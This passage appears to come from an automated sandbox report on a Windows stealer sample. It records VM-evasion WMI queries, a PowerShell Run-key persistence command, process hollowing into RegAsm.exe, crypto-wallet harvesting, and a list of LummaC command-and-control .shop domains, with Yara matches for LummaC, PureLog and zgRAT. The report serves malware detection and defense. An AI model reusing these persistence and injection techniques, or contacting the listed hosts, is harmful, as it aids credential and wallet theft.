Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries memory information (via WMI often done to detect virtual machines)

Source: C:\Users\user\Desktop\57lklPjdPc.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\Users\user\Desktop\57lklPjdPc.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\Desktop\57lklPjdPc.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

Source: C:\Users\user\Desktop\57lklPjdPc.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory

Uses ping.exe to sleep

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 localhost
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 localhost			Jump to behavior

Source: C:\Users\user\Desktop\57lklPjdPc.exe	Memory allocated: 3130000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Memory allocated: 3280000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Memory allocated: 5280000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Memory allocated: 2FE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Memory allocated: 3190000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Memory allocated: 5190000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Memory allocated: 1500000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Memory allocated: 3470000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Memory allocated: 31E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\l6E.exe	Memory allocated: 24D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\l6E.exe	Memory allocated: 2690000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\l6E.exe	Memory allocated: 4690000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\57lklPjdPc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\l6E.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\Desktop\57lklPjdPc.exe	Window / User API: threadDelayed 9922	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9221	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 684	Jump to behavior
Source: C:\Users\user\AppData\Roaming\l6E.exe	Window / User API: threadDelayed 1998	Jump to behavior

Source: C:\Users\user\Desktop\57lklPjdPc.exe TID: 3368	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe TID: 3368	Thread sleep time: -31000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe TID: 432	Thread sleep count: 9922 > 30	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe TID: 3368	Thread sleep time: -30875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe TID: 3368	Thread sleep time: -30766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe TID: 3368	Thread sleep time: -30656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe TID: 3368	Thread sleep time: -30547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe TID: 3368	Thread sleep time: -30438s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe TID: 3368	Thread sleep time: -30313s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe TID: 3368	Thread sleep time: -30203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe TID: 3368	Thread sleep time: -30094s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4036	Thread sleep count: 9221 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5900	Thread sleep count: 684 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe TID: 6040	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe TID: 6208	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\l6E.exe TID: 6916	Thread sleep count: 1998 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\l6E.exe TID: 6232	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 548	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6276	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\57lklPjdPc.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\57lklPjdPc.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXE	Last function: Thread delayed

Source: C:\Users\user\Desktop\57lklPjdPc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Thread delayed: delay time: 31000	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Thread delayed: delay time: 30875	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Thread delayed: delay time: 30766	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Thread delayed: delay time: 30656	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Thread delayed: delay time: 30547	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Thread delayed: delay time: 30438	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Thread delayed: delay time: 30313	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Thread delayed: delay time: 30203	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Thread delayed: delay time: 30094	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\l6E.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: RegAsm.exe, 0000000D.00000002.50080745880.0000000001395000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 57lklPjdPc.exe, 00000000.00000002.50545734563.0000000005DD0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

API call chain: ExitProcess graph end node

graph_13-18733

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 13_2_0043F5F0 LdrInitializeThunk,

13_2_0043F5F0

Source: C:\Users\user\Desktop\57lklPjdPc.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\57lklPjdPc.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Roaming\l6E.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Roaming\l6E.exe

Code function: 10_2_0269214D GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

10_2_0269214D

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Roaming\l6E.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: l6E.exe, 0000000A.00000002.50068622865.0000000003695000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tryyudjasudqo.shop
Source: l6E.exe, 0000000A.00000002.50068622865.0000000003695000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: eemmbryequo.shop
Source: l6E.exe, 0000000A.00000002.50068622865.0000000003695000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: reggwardssdqw.shop
Source: l6E.exe, 0000000A.00000002.50068622865.0000000003695000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: relaxatinownio.shop
Source: l6E.exe, 0000000A.00000002.50068622865.0000000003695000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tesecuuweqo.shop
Source: l6E.exe, 0000000A.00000002.50068622865.0000000003695000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tendencctywop.shop
Source: l6E.exe, 0000000A.00000002.50068622865.0000000003695000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: licenseodqwmqn.shop
Source: l6E.exe, 0000000A.00000002.50068622865.0000000003695000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: keennylrwmqlw.shop

Writes to foreign memory regions

Source: C:\Users\user\AppData\Roaming\l6E.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\l6E.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\l6E.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 445000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\l6E.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 448000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\l6E.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 458000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\l6E.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 118F008	Jump to behavior

Source: C:\Users\user\Desktop\57lklPjdPc.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '57lklPjdPc';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '57lklPjdPc' -Value '"C:\Users\user\AppData\Roaming\57lklPjdPc.exe"' -PropertyType 'String'	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\F0nw44vZv1g9.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 localhost	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\l6E.exe "C:\Users\user\AppData\Roaming\l6E.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior

Source: C:\Users\user\Desktop\57lklPjdPc.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" remove-itemproperty -path 'hkcu:\software\microsoft\windows\currentversion\run' -name '57lklpjdpc';new-itemproperty -path 'hkcu:\software\microsoft\windows\currentversion\run' -name '57lklpjdpc' -value '"c:\users\user\appdata\roaming\57lklpjdpc.exe"' -propertytype 'string'
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" remove-itemproperty -path 'hkcu:\software\microsoft\windows\currentversion\run' -name '57lklpjdpc';new-itemproperty -path 'hkcu:\software\microsoft\windows\currentversion\run' -name '57lklpjdpc' -value '"c:\users\user\appdata\roaming\57lklpjdpc.exe"' -propertytype 'string'			Jump to behavior

Source: 57lklPjdPc.exe, 00000000.00000002.50531977968.0000000003665000.00000004.00000800.00020000.00000000.sdmp, 57lklPjdPc.exe, 00000000.00000002.50531977968.0000000003689000.00000004.00000800.00020000.00000000.sdmp, 57lklPjdPc.exe, 00000000.00000002.50531977968.000000000369C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: 57lklPjdPc.exe, 00000000.00000002.50531977968.0000000003689000.00000004.00000800.00020000.00000000.sdmp, 57lklPjdPc.exe, 00000000.00000002.50531977968.00000000036BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerTemq
Source: 57lklPjdPc.exe, 00000000.00000002.50531977968.0000000003665000.00000004.00000800.00020000.00000000.sdmp, 57lklPjdPc.exe, 00000000.00000002.50531977968.000000000369C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager@\mq
Source: 57lklPjdPc.exe, 00000000.00000002.50531977968.0000000003689000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerT
Source: 57lklPjdPc.exe, 00000000.00000002.50531977968.0000000003689000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerTemq\

Source: C:\Users\user\Desktop\57lklPjdPc.exe	Queries volume information: C:\Users\user\Desktop\57lklPjdPc.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Queries volume information: C:\Users\user\AppData\Roaming\57lklPjdPc.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Queries volume information: C:\Users\user\AppData\Roaming\57lklPjdPc.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\l6E.exe	Queries volume information: C:\Users\user\AppData\Roaming\l6E.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\57lklPjdPc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: l6E.exe, 0000000A.00000002.50063183907.0000000000753000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: avp.exe
Source: l6E.exe, 0000000A.00000002.50063183907.0000000000753000.00000004.00000020.00020000.00000000.sdmp, l6E.exe.0.dr	Binary or memory string: AVP.exe

Source: C:\Users\user\Desktop\57lklPjdPc.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.57lklPjdPc.exe.458aac8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.57lklPjdPc.exe.444aaa8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.57lklPjdPc.exe.7490000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.57lklPjdPc.exe.458aac8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.57lklPjdPc.exe.7490000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.57lklPjdPc.exe.444aaa8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.50539479323.00000000043CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.50550437994.0000000007490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.50539479323.000000000458A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected zgRAT

Source: Yara match	File source: 0.2.57lklPjdPc.exe.458aac8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.57lklPjdPc.exe.444aaa8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.57lklPjdPc.exe.7490000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.57lklPjdPc.exe.458aac8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.57lklPjdPc.exe.7490000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.57lklPjdPc.exe.444aaa8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.50550437994.0000000007490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Found many strings related to Crypto-Wallets (likely being stolen)

Source: 57lklPjdPc.exe, 00000000.00000002.50531977968.000000000345B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Electrum
Source: 57lklPjdPc.exe, 00000000.00000002.50531977968.000000000345B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: com.liberty.jaxx
Source: 57lklPjdPc.exe, 00000000.00000002.50531977968.000000000345B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Exodus
Source: 57lklPjdPc.exe, 00000000.00000002.50531977968.000000000345B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: 57lklPjdPc.exe, 00000000.00000002.50531977968.000000000345B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\57lklPjdPc.exe

Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt

Jump to behavior

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.57lklPjdPc.exe.458aac8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.57lklPjdPc.exe.444aaa8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.57lklPjdPc.exe.7490000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.57lklPjdPc.exe.458aac8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.57lklPjdPc.exe.7490000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.57lklPjdPc.exe.444aaa8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.50539479323.00000000043CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.50550437994.0000000007490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.50539479323.000000000458A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected zgRAT

Source: Yara match	File source: 0.2.57lklPjdPc.exe.458aac8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.57lklPjdPc.exe.444aaa8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.57lklPjdPc.exe.7490000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.57lklPjdPc.exe.458aac8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.57lklPjdPc.exe.7490000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.57lklPjdPc.exe.444aaa8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.50550437994.0000000007490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
